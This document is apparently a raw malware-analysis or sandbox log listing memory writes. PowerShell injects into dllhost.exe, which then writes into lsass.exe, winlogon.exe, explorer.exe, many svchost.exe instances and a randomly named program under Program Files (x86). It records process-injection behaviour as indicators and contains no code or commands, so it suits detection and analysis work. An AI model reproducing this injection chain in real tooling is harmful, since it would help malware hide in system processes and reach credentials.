Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 56B245010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15B010000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15B040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 246ED7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 246EDE60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 200A1980000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 200A19B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22E670C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22E670F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275D1FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275D2660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BBDC90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BBDCC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 227D8FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 227D9540000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2DED2C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2DED2C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14ACE6E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 220AEFD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 220AF660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241B6940000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241B6970000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 202A22A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14D25AA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A63950000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1834ABA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 256EBEB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2568E1B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 226A7DC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 12A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22B68FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207EA800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 11CD5BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207C0460000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 245A2150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24708EB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F60740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26E569B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1D63DC20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A799B20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F6984F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26481BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 166D2D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 128DE440000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2101D0E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 86A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192D1E50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26DD2000000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 257155B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 16443E50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9452E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 29227D20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22C4F660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 281CF7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207EA800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28843650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207C0460000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B409660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 245A2150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C5325C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24708EB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F60740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15EC91C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1D63DC20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A799B20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F6984F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26481BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 166D2D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 128DE440000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2101D0E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 86A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192D1E50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26DD2000000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 257155B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 16443E50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9452E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 29227D20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22C4F660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 281CF7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28843650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B409660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C5325C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15EC91C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
